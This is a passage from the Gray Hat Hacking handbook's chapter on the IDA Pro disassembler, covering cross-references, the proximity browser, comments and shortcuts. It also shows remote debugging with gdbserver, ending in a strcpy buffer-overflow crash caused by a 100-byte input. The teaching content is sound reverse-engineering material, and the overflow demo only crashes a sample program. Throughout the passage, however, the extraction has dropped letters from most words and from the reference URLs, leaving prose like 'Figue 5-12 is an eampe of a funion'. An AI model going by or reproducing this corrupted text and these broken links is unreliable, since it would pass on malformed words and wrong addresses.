Figure 5-10 Import data section

Figure 5-11 Cross-references to HeapAlloc
Gray Hat Hacking: The Ethical Hacker’s Handbook
                                 NOTE There is also an operand cross-reference hotkey called JumpOpXref,
                                 which is executed by pressing x. An example use case could be a variable
                                 stored in the data segment of a program that is referenced multiple places
                                 within the code segment. Pressing x on the variable when highlighted
                                 brings up the cross-references to that variable.

              Function Calls
              Figue 5-12 is an eampe of a funion wih quie a few boks. Funions ae ofen
              muh age han his eampe. I is ommon o wan o ook a no ony a oss-
              efeenes to a funion bu aso as from a funion. To ge his infomaion in one
              pae, see View | Open Subviews | Function Calls. The unaed eampe in
              Figue 5-13 shows hee as o he ueny anayzed funion, as we as quie a few
              as fom his funion.

              Figure 5-12
              Example of a
              function

              Figure 5-13
              Function calls
Proximity Browser
The poimiy bowse, aso known as poimiy viewe (PV), feaue is usefu fo a-

                                                                                                             PART I
ing pahs wihin a pogam. Pe he He-Rays websie, “We an use he PV, fo eampe,
o visuaize he ompee agaph of a pogam, o see he pah beween 2 funions o
wha goba vaiabes ae efeened fom some funion.”2 In Figue 5-14 we ae using
poimiy bowse o ae he pah beween he main funion and a a o memcpy.
The memcpy funion has a count agumen ha speifies he numbe of byes o opy.
This funion is ofen invoved in buffe oveuns due o he impope auaion of he
count agumen, hene why i is used as an eampe.
   To open he poimiy bowse, ik View | Open Subviews | Proximity Browser.
One hee, if anyhing is dispayed by defau, you an oapse any hid o paen
nodes by igh-iking he ene node and seeing he appopiae opion. If you
igh-ik anywhee in he window ha is no a node, you ae pesened wih menu
opions. The easies mehod is o see Add Node by Name and hoose he desied
funion name fom he is as eihe he saing o ending poin. You hen pefom his
same opeaion o see he ohe poin. Finay, you an igh-ik one of he nodes and
see he Find Pah opion.

Figure 5-14
Proximity
browser
Gray Hat Hacking: The Ethical Hacker’s Handbook

Figure 5-15 General Options menu

              Opcodes and Addressing
              You may have noied in he main gaph view of IDA ha opodes and addessing ae
              no dispayed by defau. This infomaion is onsideed disaing by some anayss and
              may ake up unneessay seen spae, espeiay in 64-bi pogams. Adding his info-
              maion ino he dispay is vey simpe and is pefomed by iking Options | General.
              Figue 5-15 shows a seensho of his menu on he Disassemby ab, whee we heked
              he Line Prefixes (Gaph) opion whie in gaph view and se he Number of Opcode
              Bytes (Gaph) fied o 10. In Figue 5-16, you an see his infomaion inuded in he
              dispay. You an pess ctrl-z o undo hese hanges.

              Shortcuts
              Thee ae a o of defau shous and hokeys ha ae no inuiive, suh as pessing w
              o zoom ou and he numbe 1 o zoom in o a pedefined size. The numbes 2 and 3
              aow you o zoom in and zoom ou in a moe onoed manne. How do we know hese
              diffeen opions? Cik Options | Shortcuts o bing up he window ha onos hese
              seings. This is shown in Figue 5-17. Hee you wi find he defau hokeys, as we as
              hose ha have been hanged. The defaus may vay beween he diffeen vesions, suh
              as IDA Po, IDA Home, and IDA Fee.

                                                                PART I
Figure 5-16 Opcodes and address prefixes

Figure 5-17 Shortcuts menu
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Figure 5-18
              Regular
              comment

              Comments
              I is ommon paie o inude ommens in you ode when wiing an appiaion.
              This aows ohes who ook a you ode o undesand you hough poess and ge
              ino he same one. As he auho, i aso makes i easie fo you o ge bak up o speed
              when opening bak up he odebase. This same paie appies o evese engineeing.
              Looking a disassemby o deompied pseudoode is a ime-onsuming paie. IDA
              adds in some ommens based on avaiabe ype infomaion. Thee ae vaious ypes
              of ommens, bu wo of he mos ommon ae egua ommens and epeaabe om-
              mens. To add a egua ommen, ik he desied ine of disassemby and pess he
              oon (:) key. Type in you ommen and ik OK. An eampe of a ommen is seen
              in Figue 5-18. Pe He-Rays, a epeaabe ommen is “basiay equivaen o egua
              ommens wih one sma disinion: hey ae epeaed in any oaion whih efes o
              he oigina ommen oaion. Fo eampe, if you add a epeaabe ommen o a goba
              vaiabe, i wi be pined a any pae he vaiabe is efeened.”3

              Debugging with IDA Pro
              IDA Po inudes obus debugging suppo, boh oa and emoe. Loa debugging is
              suppoed by he pafoms on whih IDA Po is insaed, inuding maOS, Linu, and
              Windows. Remoe debugging is suppoed on vaious pafoms, inuding iOS, XNU,
              BOCHS, Ine PIN, Andoid, and ohes. We wi fous on a emoe debugging eampe
              fo his seion using GDB Seve unning on a age Kai Linu viua mahine and
              IDA Po unning on a Windows 10 viua mahine. IDA Po omes wih muipe
              emoe debugging subs ha an be opied o he desied age sysem whee an appia-
              ion is o be debugged.
                 Le’s ge igh o an eampe of emoe debugging wih IDA Po. Fo his eampe,
              we ae using he ompied vesion of he myProg pogam povided o you in you
              ~/GHHv6/ch05 fode, having peviousy oned he Gay Ha Haking 6h Ediion Gi
              eposioy. This is no a ab; howeve, if you wish o foow aong, his pogam is needed
              on he sysem whee IDA is insaed as we as on he age Kai Linu sysem. Newok
              onneiviy is equied beween he sysem unning IDA Po (debugge) and he sysem
              unning he age pogam (debuggee), as GDB Seve isens on a designaed TCP po
              numbe and awais a onneion eques. The foowing ommand sas up GDB Seve
              fo he myProg pogam and es i o isen on TCP po 23946 o awai an inoming
              onneion. The --once opion eminaes GDB Seve afe he TCP session oses, as
              opposed o auomaiay saing again.
              ┌──(kali kali)-[~/Desktop]
              └─$ gdbserver --once localhost:23946 ./myProg
              Process ./myProg created; pid = 4564
              Listening on port 23946
Figure 5-19
Remote GDB

                                                                                                         PART I
Debugger in IDA

    Wih GDB Seve unning on he age debuggee sysem, i is ime o oad he
myProg pogam ino IDA Po on he debugge sysem. We aow IDA Po o pefom
is auo-anaysis and see he Remote GDB Debugger opion, as shown in Figue 5-19.
We now ik Debugger | Process Options fom he IDA Po menu. This bings up
he diaog bo shown in Figue 5-20. The Appiaion and Inpu Fie opions ae boh
se o he oa fode whee he myProg pogam is oaed. As an eampe, if we wee
debugging a DLL oaded by a age appiaion, he Appiaion and Inpu Fie opions
woud be diffeen. Fo he Hosname opion, we have eneed he IP addess of he a-
ge debuggee sysem. The po numbe defaus o 23946, so we used his same opion
on he age sysem wih GDB Seve. One we aep hese opions, we ik he Pay
buon, shown in Figue 5-19. We ae hen pesened wih he pop-up ha says, “Thee
is aeady a poess being debugged by emoe. Do you wan o aah o i?” We ik
Yes, aowing IDA Po o aah o he emoe GDB Seve. The debugging aemp is
suessfu, and i pauses eeuion one aahed, as shown in Figue 5-21.
    Thee ae sevea seions wihin he debugging window. If you ae famiia wih
ohe debugges, hen he seions shoud ook famiia. The main and age seion,
aed IDA View-RIP, is he disassemby view. Cueny, we an see ha he insu-
ion poine (RIP) is poining o a memoy addess hoding he insuion mov rdi,
rsp. Mos of he seions inside he debugging window ae soabe. The seion beow
he disassemby window, aed Hex View-1, dumps any desied memoy segmen in
headeima fom. To he igh of Hex View-1 is he Stack view. This defaus o sa-
ing a he sak poine (RSP) addess, dumping he onens of memoy fo he uen
head’s sak. Above he Sak view seion ae he Threads and Modules seions.

Figure 5-20 IDA debugging options window
Gray Hat Hacking: The Ethical Hacker’s Handbook

Figure 5-21 IDA Pro remote debugging session

              Finay, in he op igh is he General Registers seion. This seion shows he genea-
              pupose poesso egises as we as addiiona egises, inuding he FLAGS egise
              and Segmen egises.
                 Debugge onos ae aivaed hough assigned hokeys, ibbon ba menu ions, o
              by going hough he debugging menu. If we ik Pay o aow he pogam o oninue
              eeuion, i simpy eminaes, as we have no povided any ommand-ine agumens.
              When ooking a he Impos abe wihin his pogam, we see hee is a a o he
              depeaed strcpy funion, as shown in Figue 5-22. We hen use Poimiy Bowse o
              ae he pah fom he main funion o strcpy, as shown in Figue 5-23. When ook-
              ing a he func1 funion, we an see he a o strcpy, as we as he buffe size fo he
              desinaion a 040, o 64 byes. We ne se a beakpoin on he a o strcpy, as shown
              in Figue 5-24, by iking he addess and pessing he f2 beakpoin hokey.

Figure 5-22 Deprecated call to the strcpy function
Figure 5-23
Proximity

                                                                                                                 PART I
Browser path
to strcpy

  Wih he beakpoin se on he strcpy funion, and undesanding he desinaion
buffe size, e’s pass in 100 byes as ou agumen o see if we an ge he poess o ash.
We modify ou gdbserver ommand o inude some Pyhon syna on he end as suh:
┌──(kali kali)-[~/Desktop]
└─$ gdbserver --once localhost:23946 ./myProg `python3 -c 'print("A" * 100)'`
Process ./myProg created; pid = 8439
Listening on port 23946

Figure 5-24
Breakpoint set
on strcpy
Gray Hat Hacking: The Ethical Hacker’s Handbook

Figure 5-25 Breakpoint on strcpy

                 We hen ik he Pay buon inside of IDA o iniiae he onneion o he debug-
              gee. One aahed, we mus ik he Pay buon again o oninue o ou beak-
              poin on he strcpy funion. The esu is shown in Figue 5-25. The soue agumen
              addessed has been dumped o he Hex View seion so ha we an see wha is going
              o be opied o he desinaion buffe on he sak. Pessing he f9 oninue eeuion
              hokey in IDA esus in an epeed ash, as shown in Figue 5-26. Snippes ae aken

Figure 5-26 Crash caught in IDA Pro Debugger
fom he debugge ha show he waning abou a segmenaion fau, he esuing
General Registers seion, and Stack view seion.

                                                                                                            PART I
   Having he abiiy o oay and emoey debug pogams using IDA Po’s gaphia
fon end, aong wih vaious debugging subs, an geay speed up you anaysis.

Summary
This hape povides you wih he basis of geing saed in using IDA Po as a evese
engineeing oo. Thee ae fa oo many feaues and eensibiiy opions o fi ino a
singe hape. We ooked a geing o know he IDA Po inefae, some of he mos
ommony used feaues of IDA, as we as geing up and unning wih emoe debug-
ging. We wi be using IDA Po in ae hapes oveing Miosof pah diffing and
Windows epoiaion. The bes way o ean o use IDA Po is o ake a basi C pogam,
ike he ones used in his hape, and sa evesing. You an epe o spend a o of
ime googing he answes o quesions aound diffeen assemby insuions and how
o do speifi hings wih IDA Po. You wi see you skis quiky impoving he moe
you use he oo and beome famiia wih evesing wih IDA Po.

For Further Reading
Hex-Rays Blog www.he-ays.om/bog/
IDA Debugger www.he-ays.om/podus/ida/debugge/
IDA Freeware www.he-ays.om/podus/ida/suppo/downoad_feewae/
OpenRCE www.opene.og/aies/
Reverse Engineering Reddit www.eddi.om//ReveseEngineeing/
Reverse Engineering Stack Overflow eveseengineeing.sakehange.om

References
   1. Miosof, “Heapao funion (heapapi.h) – win32 apps” (Deembe 5, 2018),
      hps://dos.miosof.om/en-us/windows/win32/api/heapapi/nf-heapapi-heapao
      (eieved Mah 19, 2021).
   2. Koe, J., “New feaue in IDA 6.2: The poimiy bowse” (Augus 8, 2011),
      hps://www.he-ays.om/bog/new-feaue-in-ida-6-2-he-poimiy-bowse/
      (eieved Mah 20, 2021).
   3. Skohinsky, I., “Igo’s ip of he week #14: Commens in IDA” (Novembe 6, 2020),
      hps://www.he-ays.om/bog/igo-ip-of-he-week-14-ommens-in-ida/
      (eieved Mah 20, 2021).
This page intentionally left blank
